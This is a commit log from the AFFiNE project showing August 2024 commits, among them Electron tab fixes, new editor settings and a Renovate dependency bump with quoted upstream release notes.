2024-08-22 17:46:06 +00:00
pengx17
5e555b3807
fix(electron): adjust app-tabs-header styles ( #7947 )
...
fix AF-1171
2024-08-22 13:10:27 +00:00
darkskygit
3b727ef40a
chore: revert breaking change deps ( #7949 )
2024-08-22 12:08:07 +00:00
EYHN
4bc4a58a30
feat(infra): add convenience api to get workspace from doc ( #7934 )
2024-08-22 11:22:04 +00:00
pengx17
2f02f0da2b
fix(electron): should not send switchSplitView event when clicking on the active view ( #7944 )
2024-08-22 05:26:29 +00:00
pengx17
592150638e
feat(electron): switch to next/previous tab with Ctrl+Tab/Ctrl+Shift+Tab ( #7943 )
...
fix PD-1569
2024-08-22 04:46:25 +00:00
JimmFly
20174b9cbe
feat(core): add custom font family setting ( #7924 )
...
close AF-1255
https://github.com/user-attachments/assets/d44359b6-b75c-4883-a57b-1f226586feec
2024-08-22 04:24:44 +00:00
JimmFly
b333cde336
feat(core): init editor setting ui ( #7878 )
...
- init editor setting ui
https://github.com/user-attachments/assets/c54f5816-ef05-4ac0-b11a-8ab7159f928c
2024-08-22 04:24:41 +00:00
JimmFly
03c4d56a91
feat(component): add slider ui component ( #7879 )
...

2024-08-22 04:24:37 +00:00
renovate
2e2a3af967
chore: bump up all non-major dependencies ( #7925 )
...
[](https://renovatebot.com )
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence | Type | Update |
|---|---|---|---|---|---|---|---|
| [@aws-sdk/client-s3](https://togithub.com/aws/aws-sdk-js-v3/tree/main/clients/client-s3 ) ([source](https://togithub.com/aws/aws-sdk-js-v3/tree/HEAD/clients/client-s3 )) | [`3.633.0` -> `3.635.0`](https://renovatebot.com/diffs/npm/@aws-sdk%2fclient-s3/3.633.0/3.635.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@aws-sdk/client-s3](https://togithub.com/aws/aws-sdk-js-v3/tree/main/clients/client-s3 ) ([source](https://togithub.com/aws/aws-sdk-js-v3/tree/HEAD/clients/client-s3 )) | [`3.633.0` -> `3.635.0`](https://renovatebot.com/diffs/npm/@aws-sdk%2fclient-s3/3.633.0/3.635.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@chromatic-com/storybook](https://togithub.com/chromaui/addon-visual-tests ) | [`1.6.1` -> `1.7.0`](https://renovatebot.com/diffs/npm/@chromatic-com%2fstorybook/1.6.1/1.7.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@emotion/react](https://togithub.com/emotion-js/emotion/tree/main#readme ) ([source](https://togithub.com/emotion-js/emotion )) | [`11.13.0` -> `11.13.3`](https://renovatebot.com/diffs/npm/@emotion%2freact/11.13.0/11.13.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@emotion/react](https://togithub.com/emotion-js/emotion/tree/main#readme ) ([source](https://togithub.com/emotion-js/emotion )) | [`11.13.0` -> `11.13.3`](https://renovatebot.com/diffs/npm/@emotion%2freact/11.13.0/11.13.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [@fal-ai/serverless-client](https://togithub.com/fal-ai/fal-js ) ([source](https://togithub.com/fal-ai/fal-js/tree/HEAD/libs/client )) | [`^0.13.0` -> `^0.14.0`](https://renovatebot.com/diffs/npm/@fal-ai%2fserverless-client/0.13.0/0.14.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@napi-rs/cli](https://togithub.com/napi-rs/napi-rs ) | [`3.0.0-alpha.60` -> `3.0.0-alpha.62`](https://renovatebot.com/diffs/npm/@napi-rs%2fcli/3.0.0-alpha.60/3.0.0-alpha.62 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@playwright/test](https://playwright.dev ) ([source](https://togithub.com/microsoft/playwright )) | [`=1.44.1` -> `=1.46.1`](https://renovatebot.com/diffs/npm/@playwright%2ftest/1.44.1/1.46.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@types/react](https://togithub.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/react ) ([source](https://togithub.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/react )) | [`18.3.3` -> `18.3.4`](https://renovatebot.com/diffs/npm/@types%2freact/18.3.3/18.3.4 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@vanilla-extract/css](https://togithub.com/vanilla-extract-css/vanilla-extract ) ([source](https://togithub.com/vanilla-extract-css/vanilla-extract/tree/HEAD/packages/css )) | [`1.15.4` -> `1.15.5`](https://renovatebot.com/diffs/npm/@vanilla-extract%2fcss/1.15.4/1.15.5 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@vanilla-extract/vite-plugin](https://togithub.com/vanilla-extract-css/vanilla-extract ) ([source](https://togithub.com/vanilla-extract-css/vanilla-extract/tree/HEAD/packages/vite-plugin )) | [`4.0.14` -> `4.0.15`](https://renovatebot.com/diffs/npm/@vanilla-extract%2fvite-plugin/4.0.14/4.0.15 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@vanilla-extract/webpack-plugin](https://togithub.com/vanilla-extract-css/vanilla-extract ) ([source](https://togithub.com/vanilla-extract-css/vanilla-extract/tree/HEAD/packages/webpack-plugin )) | [`2.3.12` -> `2.3.13`](https://renovatebot.com/diffs/npm/@vanilla-extract%2fwebpack-plugin/2.3.12/2.3.13 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [core-js](https://togithub.com/zloirock/core-js ) ([source](https://togithub.com/zloirock/core-js/tree/HEAD/packages/core-js )) | [`3.38.0` -> `3.38.1`](https://renovatebot.com/diffs/npm/core-js/3.38.0/3.38.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [core-js](https://togithub.com/zloirock/core-js ) ([source](https://togithub.com/zloirock/core-js/tree/HEAD/packages/core-js )) | [`3.38.0` -> `3.38.1`](https://renovatebot.com/diffs/npm/core-js/3.38.0/3.38.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [dayjs](https://day.js.org ) ([source](https://togithub.com/iamkun/dayjs )) | [`1.11.12` -> `1.11.13`](https://renovatebot.com/diffs/npm/dayjs/1.11.12/1.11.13 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [electron](https://togithub.com/electron/electron ) | [`32.0.0` -> `32.0.1`](https://renovatebot.com/diffs/npm/electron/32.0.0/32.0.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [embla-carousel-react](https://www.embla-carousel.com ) ([source](https://togithub.com/davidjerleke/embla-carousel )) | [`8.1.8` -> `8.2.0`](https://renovatebot.com/diffs/npm/embla-carousel-react/8.1.8/8.2.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [husky](https://togithub.com/typicode/husky ) | [`9.1.4` -> `9.1.5`](https://renovatebot.com/diffs/npm/husky/9.1.4/9.1.5 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [jotai-scope](https://togithub.com/jotaijs/jotai-scope ) | [`0.7.1` -> `0.7.2`](https://renovatebot.com/diffs/npm/jotai-scope/0.7.1/0.7.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [lucide-react](https://lucide.dev ) ([source](https://togithub.com/lucide-icons/lucide/tree/HEAD/packages/lucide-react )) | [`^0.408.0` -> `^0.429.0`](https://renovatebot.com/diffs/npm/lucide-react/0.408.0/0.429.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [napi](https://togithub.com/napi-rs/napi-rs ) | `3.0.0-alpha.7` -> `3.0.0-alpha.8` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [napi-derive](https://togithub.com/napi-rs/napi-rs ) | `3.0.0-alpha.6` -> `3.0.0-alpha.7` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [nestjs-throttler-storage-redis](https://togithub.com/kkoomen/nestjs-throttler-storage-redis ) | [`^0.4.1` -> `^0.5.0`](https://renovatebot.com/diffs/npm/nestjs-throttler-storage-redis/0.4.4/0.5.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [node](https://nodejs.org ) ([source](https://togithub.com/nodejs/node )) | `20.15.1` -> `20.16.0` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | | minor |
| openresty/openresty | `1.25.3.1-0-buster` -> `1.25.3.2-0-buster` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | final | patch |
| [playwright](https://playwright.dev ) ([source](https://togithub.com/microsoft/playwright )) | [`=1.44.1` -> `=1.46.1`](https://renovatebot.com/diffs/npm/playwright/1.44.1/1.46.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [react-refresh](https://reactjs.org/ ) ([source](https://togithub.com/facebook/react/tree/HEAD/packages/react )) | [`^0.10.0` -> `^0.14.0`](https://renovatebot.com/diffs/npm/react-refresh/0.10.0/0.14.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [serde](https://serde.rs ) ([source](https://togithub.com/serde-rs/serde )) | `1.0.204` -> `1.0.208` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [serde_json](https://togithub.com/serde-rs/json ) | `1.0.120` -> `1.0.125` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [storybook-dark-mode](https://togithub.com/hipstersmoothie/storybook-dark-mode ) | [`4.0.1` -> `4.0.2`](https://renovatebot.com/diffs/npm/storybook-dark-mode/4.0.1/4.0.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [tokio](https://tokio.rs ) ([source](https://togithub.com/tokio-rs/tokio )) | `1.38.0` -> `1.39.3` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dev-dependencies | minor |
| [tokio](https://tokio.rs ) ([source](https://togithub.com/tokio-rs/tokio )) | `1.38.0` -> `1.39.3` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | minor |
| [vite](https://vitejs.dev ) ([source](https://togithub.com/vitejs/vite/tree/HEAD/packages/vite )) | [`5.4.1` -> `5.4.2`](https://renovatebot.com/diffs/npm/vite/5.4.1/5.4.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [vite-plugin-dts](https://togithub.com/qmhc/vite-plugin-dts ) | [`4.0.2` -> `4.0.3`](https://renovatebot.com/diffs/npm/vite-plugin-dts/4.0.2/4.0.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [wrangler](https://togithub.com/cloudflare/workers-sdk ) ([source](https://togithub.com/cloudflare/workers-sdk/tree/HEAD/packages/wrangler )) | [`3.72.0` -> `3.72.1`](https://renovatebot.com/diffs/npm/wrangler/3.72.0/3.72.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
---
### Release Notes
<details>
<summary>aws/aws-sdk-js-v3 (@​aws-sdk/client-s3)</summary>
### [`v3.635.0`](https://togithub.com/aws/aws-sdk-js-v3/blob/HEAD/clients/client-s3/CHANGELOG.md#36350-2024-08-20 )
[Compare Source](https://togithub.com/aws/aws-sdk-js-v3/compare/v3.633.0...v3.635.0 )
##### Features
- **client-s3:** Amazon Simple Storage Service / Features : Add support for conditional writes for PutObject and CompleteMultipartUpload APIs. ([b474584](b474584f2c ))
- **codegen:** add Smithy RPCv2 CBOR to list of protocols ([#​6096](https://togithub.com/aws/aws-sdk-js-v3/issues/6096 )) ([5154d4f](5154d4f19b ))
</details>
<details>
<summary>chromaui/addon-visual-tests (@​chromatic-com/storybook)</summary>
### [`v1.7.0`](https://togithub.com/chromaui/addon-visual-tests/blob/HEAD/CHANGELOG.md#v170-Tue-Aug-20-2024 )
[Compare Source](https://togithub.com/chromaui/addon-visual-tests/compare/v1.6.1...v1.7.0 )
##### 🚀 Enhancement
- Update story status reporting for Storybook 8.3 and use new `SET_FILTER` event [#​332](https://togithub.com/chromaui/addon-visual-tests/pull/332 ) ([@​ghengeveld](https://togithub.com/ghengeveld ))
##### Authors: 1
- Gert Hengeveld ([@​ghengeveld](https://togithub.com/ghengeveld ))
***
</details>
<details>
<summary>emotion-js/emotion (@​emotion/react)</summary>
### [`v11.13.3`](https://togithub.com/emotion-js/emotion/compare/@emotion/react@11.13.0...3f468846855ed1c6092922a6317a6f5df0ba8dcc )
[Compare Source](https://togithub.com/emotion-js/emotion/compare/@emotion/react@11.13.0...@emotion/react@11.13.3 )
</details>
<details>
<summary>fal-ai/fal-js (@​fal-ai/serverless-client)</summary>
### [`v0.14.2`](c3a3c3d21a...b3ab5f0e15 )
[Compare Source](c3a3c3d21a...b3ab5f0e15 )
### [`v0.14.1`](6edbf2948d...c3a3c3d21a )
[Compare Source](6edbf2948d...c3a3c3d21a )
### [`v0.14.0`](cf300e9cc0...6edbf2948d )
[Compare Source](cf300e9cc0...6edbf2948d )
</details>
<details>
<summary>napi-rs/napi-rs (@​napi-rs/cli)</summary>
### [`v3.0.0-alpha.62`](https://togithub.com/napi-rs/napi-rs/compare/@napi-rs/cli@3.0.0-alpha.61...@napi-rs/cli@3.0.0-alpha.62 )
[Compare Source](https://togithub.com/napi-rs/napi-rs/compare/@napi-rs/cli@3.0.0-alpha.61...@napi-rs/cli@3.0.0-alpha.62 )
### [`v3.0.0-alpha.61`](https://togithub.com/napi-rs/napi-rs/compare/@napi-rs/cli@3.0.0-alpha.60...@napi-rs/cli@3.0.0-alpha.61 )
[Compare Source](https://togithub.com/napi-rs/napi-rs/compare/@napi-rs/cli@3.0.0-alpha.60...@napi-rs/cli@3.0.0-alpha.61 )
</details>
<details>
<summary>microsoft/playwright (@​playwright/test)</summary>
### [`v1.46.1`](https://togithub.com/microsoft/playwright/compare/v1.46.0...e1c861cfa7a6caf3c5b798786b1e6298c4f3cf31 )
[Compare Source](https://togithub.com/microsoft/playwright/compare/v1.46.0...v1.46.1 )
### [`v1.46.0`](https://togithub.com/microsoft/playwright/compare/v1.45.3...99a36310570617222290c09b96a2026beb8b00f9 )
[Compare Source](https://togithub.com/microsoft/playwright/compare/v1.45.3...v1.46.0 )
### [`v1.45.3`](https://togithub.com/microsoft/playwright/compare/v1.45.2...0e130fa8edaf85765c4a5a86bded0e6d33bfd7c2 )
[Compare Source](https://togithub.com/microsoft/playwright/compare/v1.45.2...v1.45.3 )
### [`v1.45.2`](https://togithub.com/microsoft/playwright/compare/v1.45.1...d8a5f3b33193e413b404ff4aa1f71e859d8f1b6b )
[Compare Source](https://togithub.com/microsoft/playwright/compare/v1.45.1...v1.45.2 )
### [`v1.45.1`](https://togithub.com/microsoft/playwright/compare/v1.45.0...e8989f83d9801cdaadc3803b5341c601c9593947 )
[Compare Source](https://togithub.com/microsoft/playwright/compare/v1.45.0...v1.45.1 )
### [`v1.45.0`](https://togithub.com/microsoft/playwright/compare/v1.44.1...4f3f6eecae490af444dd9298c9eaeb0c596915b7 )
[Compare Source](https://togithub.com/microsoft/playwright/compare/v1.44.1...v1.45.0 )
</details>
<details>
<summary>vanilla-extract-css/vanilla-extract (@​vanilla-extract/css)</summary>
### [`v1.15.5`](https://togithub.com/vanilla-extract-css/vanilla-extract/blob/HEAD/packages/css/CHANGELOG.md#1155 )
[Compare Source](https://togithub.com/vanilla-extract-css/vanilla-extract/compare/@vanilla-extract/css@1.15.4...@vanilla-extract/css@1.15.5 )
##### Patch Changes
- [#​1466](https://togithub.com/vanilla-extract-css/vanilla-extract/pull/1466 ) [`6432199fa0717f424fb3f45fbe36410b03b01c1c`](6432199fa0 ) Thanks [@​askoufis](https://togithub.com/askoufis )! - Speed up dev prefix generation for long file paths
</details>
<details>
<summary>vanilla-extract-css/vanilla-extract (@​vanilla-extract/vite-plugin)</summary>
### [`v4.0.15`](https://togithub.com/vanilla-extract-css/vanilla-extract/blob/HEAD/packages/vite-plugin/CHANGELOG.md#4015 )
[Compare Source](https://togithub.com/vanilla-extract-css/vanilla-extract/compare/@vanilla-extract/vite-plugin@4.0.14...@vanilla-extract/vite-plugin@4.0.15 )
##### Patch Changes
- Updated dependencies \[[`96dd466127374b21ad7e48e5dd168a03a96af047`](96dd466127 )]:
- [@​vanilla-extract/integration](https://togithub.com/vanilla-extract/integration )[@​7](https://togithub.com/7 ).1.9
</details>
<details>
<summary>vanilla-extract-css/vanilla-extract (@​vanilla-extract/webpack-plugin)</summary>
### [`v2.3.13`](https://togithub.com/vanilla-extract-css/vanilla-extract/blob/HEAD/packages/webpack-plugin/CHANGELOG.md#2313 )
[Compare Source](https://togithub.com/vanilla-extract-css/vanilla-extract/compare/@vanilla-extract/webpack-plugin@2.3.12...@vanilla-extract/webpack-plugin@2.3.13 )
##### Patch Changes
- Updated dependencies \[[`96dd466127374b21ad7e48e5dd168a03a96af047`](96dd466127 )]:
- [@​vanilla-extract/integration](https://togithub.com/vanilla-extract/integration )[@​7](https://togithub.com/7 ).1.9
</details>
<details>
<summary>zloirock/core-js (core-js)</summary>
### [`v3.38.1`](https://togithub.com/zloirock/core-js/blob/HEAD/CHANGELOG.md#3381---20240820 )
[Compare Source](https://togithub.com/zloirock/core-js/compare/v3.38.0...v3.38.1 )
- Changes [v3.38.0...v3.38.1](https://togithub.com/zloirock/core-js/compare/v3.38.0...v3.38.1 )
- Fixed some cases of `URLSearchParams` percent decoding, [#​1357](https://togithub.com/zloirock/core-js/issues/1357 ), [#​1361](https://togithub.com/zloirock/core-js/pull/1361 ), thanks [**@​slowcheetah**](https://togithub.com/slowcheetah )
- Some stylistic changes and minor optimizations
- Compat data improvements:
- [`Iterator` helpers proposal](https://togithub.com/tc39/proposal-iterator-helpers ) methods marked as [shipped from FF131](https://bugzilla.mozilla.org/show_bug.cgi?id=1896390 )
- [`Math.f16round` and `DataView.prototype.{ getFloat16, setFloat16 }`](https://togithub.com/tc39/proposal-float16array ) marked as shipped from Bun 1.1.23
- [`RegExp.escape`](https://togithub.com/tc39/proposal-regex-escaping ) marked as shipped from Bun 1.1.22
- [`Promise.try`](https://togithub.com/tc39/proposal-promise-try ) marked as shipped from Bun 1.1.22
- [`Uint8Array` to / from base64 and hex proposal](https://togithub.com/tc39/proposal-arraybuffer-base64 ) methods marked as shipped from Bun 1.1.22
- Added Hermes 0.13 compat data, similar to React Native 0.75 Hermes
- Added Opera Android 84 compat data mapping
</details>
<details>
<summary>iamkun/dayjs (dayjs)</summary>
### [`v1.11.13`](https://togithub.com/iamkun/dayjs/compare/v1.11.12...93c8fd0f807b8a8252f4cd65083bb1d6a49b90e7 )
[Compare Source](https://togithub.com/iamkun/dayjs/compare/v1.11.12...v1.11.13 )
</details>
<details>
<summary>electron/electron (electron)</summary>
### [`v32.0.1`](https://togithub.com/electron/electron/compare/v32.0.0...v32.0.1 )
[Compare Source](https://togithub.com/electron/electron/compare/v32.0.0...v32.0.1 )
</details>
<details>
<summary>davidjerleke/embla-carousel (embla-carousel-react)</summary>
### [`v8.2.0`](https://togithub.com/davidjerleke/embla-carousel/compare/v8.1.8...6baf1555c6f68e88a7f785213ecf363f447a8b2f )
[Compare Source](https://togithub.com/davidjerleke/embla-carousel/compare/v8.1.8...v8.2.0 )
</details>
<details>
<summary>typicode/husky (husky)</summary>
### [`v9.1.5`](https://togithub.com/typicode/husky/compare/v9.1.4...2fee8d212c601942ad146ea9209f15c20a07fb6d )
[Compare Source](https://togithub.com/typicode/husky/compare/v9.1.4...v9.1.5 )
</details>
<details>
<summary>jotaijs/jotai-scope (jotai-scope)</summary>
### [`v0.7.2`](https://togithub.com/jotaijs/jotai-scope/compare/v0.7.1...v0.7.2 )
[Compare Source](https://togithub.com/jotaijs/jotai-scope/compare/v0.7.1...v0.7.2 )
</details>
<details>
<summary>lucide-icons/lucide (lucide-react)</summary>
### [`v0.429.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.429.0 ): New icons 0.429.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.428.0...0.429.0 )
#### Modified Icons 🔨
- `message-square-dashed` ([#​2374](https://togithub.com/lucide-icons/lucide/issues/2374 )) by [@​jguddas](https://togithub.com/jguddas )
- `stethoscope` ([#​2379](https://togithub.com/lucide-icons/lucide/issues/2379 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
### [`v0.428.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.428.0 ): New icons 0.428.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.427.0...0.428.0 )
#### New icons 🎨
- `tickets-plane` ([#​2196](https://togithub.com/lucide-icons/lucide/issues/2196 )) by [@​jguddas](https://togithub.com/jguddas )
#### Modified Icons 🔨
- `folder-search` ([#​2354](https://togithub.com/lucide-icons/lucide/issues/2354 )) by [@​jguddas](https://togithub.com/jguddas )
### [`v0.427.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.427.0 ): New icons 0.427.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.426.0...0.427.0 )
#### New icons 🎨
- `binoculars` ([#​2207](https://togithub.com/lucide-icons/lucide/issues/2207 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `tickets` ([#​2335](https://togithub.com/lucide-icons/lucide/issues/2335 )) by [@​jguddas](https://togithub.com/jguddas )
### [`v0.426.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.426.0 ): New icons 0.426.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.425.0...0.426.0 )
#### New icons 🎨
- `chevrons-left-right-ellipsis` ([#​2120](https://togithub.com/lucide-icons/lucide/issues/2120 )) by [@​ericfennis](https://togithub.com/ericfennis )
- `ethernet-port` ([#​2120](https://togithub.com/lucide-icons/lucide/issues/2120 )) by [@​ericfennis](https://togithub.com/ericfennis )
#### Modified Icons 🔨
- `cigarette-off` ([#​2282](https://togithub.com/lucide-icons/lucide/issues/2282 )) by [@​jguddas](https://togithub.com/jguddas )
- `cigarette` ([#​2282](https://togithub.com/lucide-icons/lucide/issues/2282 )) by [@​jguddas](https://togithub.com/jguddas )
### [`v0.425.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.425.0 ): New icons 0.425.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.424.0...0.425.0 )
#### New icons 🎨
- `bandage` ([#​2341](https://togithub.com/lucide-icons/lucide/issues/2341 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `table-of-contents` ([#​2348](https://togithub.com/lucide-icons/lucide/issues/2348 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
#### Modified Icons 🔨
- `mouse-pointer-2` ([#​2350](https://togithub.com/lucide-icons/lucide/issues/2350 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `mouse-pointer-ban` ([#​2350](https://togithub.com/lucide-icons/lucide/issues/2350 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `mouse-pointer-click` ([#​2350](https://togithub.com/lucide-icons/lucide/issues/2350 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `mouse-pointer` ([#​2350](https://togithub.com/lucide-icons/lucide/issues/2350 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `square-dashed-mouse-pointer` ([#​2350](https://togithub.com/lucide-icons/lucide/issues/2350 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `square-mouse-pointer` ([#​2350](https://togithub.com/lucide-icons/lucide/issues/2350 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
### [`v0.424.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.424.0 ): New icons 0.424.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.423.0...0.424.0 )
#### New icons 🎨
- `map-pin-house` ([#​2337](https://togithub.com/lucide-icons/lucide/issues/2337 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
#### Modified Icons 🔨
- `replace-all` ([#​2333](https://togithub.com/lucide-icons/lucide/issues/2333 )) by [@​jguddas](https://togithub.com/jguddas )
- `replace` ([#​2333](https://togithub.com/lucide-icons/lucide/issues/2333 )) by [@​jguddas](https://togithub.com/jguddas )
